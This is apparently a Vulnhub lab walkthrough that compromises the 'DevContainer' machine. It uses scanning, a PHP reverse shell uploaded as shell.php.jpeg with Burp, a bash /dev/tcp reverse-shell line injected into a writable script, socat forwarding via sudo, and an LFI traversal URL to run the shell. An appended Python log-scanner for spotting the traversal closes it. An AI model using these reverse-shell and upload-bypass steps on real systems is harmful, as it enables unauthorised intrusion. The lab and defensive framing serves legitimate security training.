**DevContainer**

Alperen Ugurlu
3 min read · Dec 21, 2020

*Vulnhub Walkthrough*

#alperenugurlu

First of all, we learn the ‘IP’ address of the machine.

root@kali:~# netdiscover -r 10.0.2.0/24

Now we scan all ports with the ‘nmap’ tool and determine the service and version.

root@kali:~# nmap -sS -sV -A -p- 10.0.2.15

Enumerating hidden and existing files is useful in both local network and web application penetration tests. Security is very important in penetration tests. For this, we use my preferred tool, ‘dirb’. Its output tells us that the directories returning code ‘200’ are the ones we have the right to access.

There is the “upload” directory that interests me. Can I inject the “reverse shell” here? If I can inject, we can access it via netcat.

We create a reverse-shell right now.
Next, we edit it so that we can listen for the connection: we write our own IP and the port we want to listen on. We save the file as shell.php.jpeg (to pass the security filter).

When uploading the file, we intervene with the ‘burp suite’ tool and forward the php.jpeg extension as php.
We listen with the nc -lvnp 2345 command.

There was a folder that caught my attention while reviewing the files. We go to the /var/www/html folder. Here we see a file named Maintenance-Web-Docker. I found the bash file. I immediately thought: could I do a reverse-shell here for higher privileges? Our command is:

echo "bash -i >& /dev/tcp/<local_ip>/<LPORT> 0>&1" > list.sh

We are listening with netcat in a new terminal.
nc -lnvp 2222

and finally we got to ‘richard’. =)

We recovered our password from user.txt. We check the root rights with the sudo -l command. We came across information about another directory. Let’s go there and see what’s inside. Here we run:

sudo -u root /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90

Now we type the IP address of the machine we attacked into our browser, with port 8080. Another website appears. Here the ‘about us’ and communication buttons appear, and it comes to my mind that it may be ‘LFI’... =) Let’s see…

Yes! There is an LFI vulnerability. We can exploit it now. We can re-upload the reverse-shell we made at the beginning and listen.

We set another port by editing our reverse-shell code. Using Burp, we manipulate the request and upload it in the same way. We copy this shell from the upload files folder using ‘mv shell.php /tmp/shell.php’. We go to 10.0.2.15:8080/index.php?view=../../../../../../home/richard/web/upload/files/shell.php. Then we listen, open proof.txt and grab our flag! =)
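From the defender's side, the `view` request above is easy to spot in web server logs. The following is an added example, not part of the original walkthrough: it flags any `view` value that resolves outside the directory the application is meant to serve from, including percent-encoded forms that a plain search for `../` would miss. The views directory, the access-log format and the log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: the application is meant to include files only from this directory.
VIEWS_ROOT = "/home/richard/web/views"  # hypothetical path
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e%252e -> ..), up to `rounds` passes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def view_escapes_root(view, root=VIEWS_ROOT):
    """True when the `view` value resolves outside the views directory."""
    view = fully_decode(view).replace("\\", "/")
    if "\x00" in view:
        return True
    # An absolute `view` replaces the root in join(); normpath collapses ../ runs.
    resolved = posixpath.normpath(posixpath.join(root, view))
    return not (resolved == root or resolved.startswith(root + "/"))

def suspicious_requests(log_lines, param="view"):
    """Return (line_number, value) for each request whose `view` leaves the root."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if view_escapes_root(value):
                hits.append((number, value))
    return hits

# Constructed access-log lines (combined-log style), not captured from the target.
SAMPLE_LOG = [
    '10.0.2.4 - - [21/Dec/2020:10:00:01 +0000] "GET /index.php?view=about-us.html HTTP/1.1" 200 812',
    '10.0.2.4 - - [21/Dec/2020:10:02:13 +0000] "GET /index.php?view=../../../../../../home/richard/web/upload/files/shell.php HTTP/1.1" 200 0',
    '10.0.2.4 - - [21/Dec/2020:10:02:40 +0000] "GET /index.php?view=%252e%252e%252fconfig.php HTTP/1.1" 200 96',
    '10.0.2.4 - - [21/Dec/2020:10:03:05 +0000] "GET /index.php?view=contact.html HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: view escapes {VIEWS_ROOT}: {value}")
```

The same containment test (resolve the path, then require it to stay under the views directory) is what the application itself should apply before including a file.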
